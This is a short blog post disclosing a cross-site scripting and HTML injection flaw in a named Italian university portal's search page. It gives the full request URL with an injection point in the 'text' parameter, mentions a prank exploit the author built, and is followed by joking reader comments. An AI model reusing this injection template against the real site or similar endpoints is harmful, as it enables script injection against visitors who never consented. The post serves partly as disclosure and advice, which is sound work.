The exploit looks like this:
http://portale.unitn.it/scienze/search.do
?action_to_do=search_matching_values
&all=all
&cerca=Cerca
&channelId=-12827
&fast_search_radio=obj-search-quick-radio-unitn
&hidden_flag=hidden_flag
&page=/jsp/commonresultLucene.jsp
&pageToCall=show_all_people
&schInto=portal
&schOrder=orderRel
&schType=schAllWord
&search=
&text="<p/><_INJECTION_GOES_HERE_>
Javascript injection works without restrictions, and html injection of course too. So I build a simple exploit in honor of my friend Maurizio Grasso, take a look at it:
http://portale.unitn.it/scienze
I encourage all of you to install the "noscript" plugin for firefox, that blocks such an attack very easily.
10 commenti:
Ogni volta che guardo quella pagina non riesco a non scoppiare a ridere!! Mauri.
He is too lame to write in english..
Fuck you :D
What a nice web site!
The only problem is... that I cannot understand any single word related to the vaste universe of net-technologies... ;)
Marghe
hi cousin! welcome to my blog!
It doesn't matter if you don't understand, your comments are always welcome. At least the counter of visitors will be increased :P
The example is very original ;)
yeah, i don't know why thomas always speaks about me in his topics...maybe..he is...... :P
...A female comment is always a note of colour in this blog...
...Un commentaire féminin est toujours un commentaire de couleur dans ce blog...
...женский комментарий - это всегда одно примечание цвета в этом журнале...
CAPITO??? ;)
Ciao Thomas... io pero' ti scrivo in italiano :). Buona giornata alla ricerca di vulnerabilita' ;)
@federico:
eheh u'r right :)
@maurizio:
..I think you didn't read the unitn link carefully (on who is ...)
@@tomic: (double '@' lol..)
yeah, the only women that knows what to say/write at every minute of his life (..maybe its always crap.. lol)
@ivan:
Grande ivan che sei passato, ho dato 1 occhiata anche io al tuo blog,appena ho tempo ci posto qualcosina..
..cmq ho delle nuove vulnerabilità da postare, però prima voglio indagare e decidere su cosa pubblicare o meno,dato che il gray-hat hacking non è mai visto molto bene :P
Posta un commento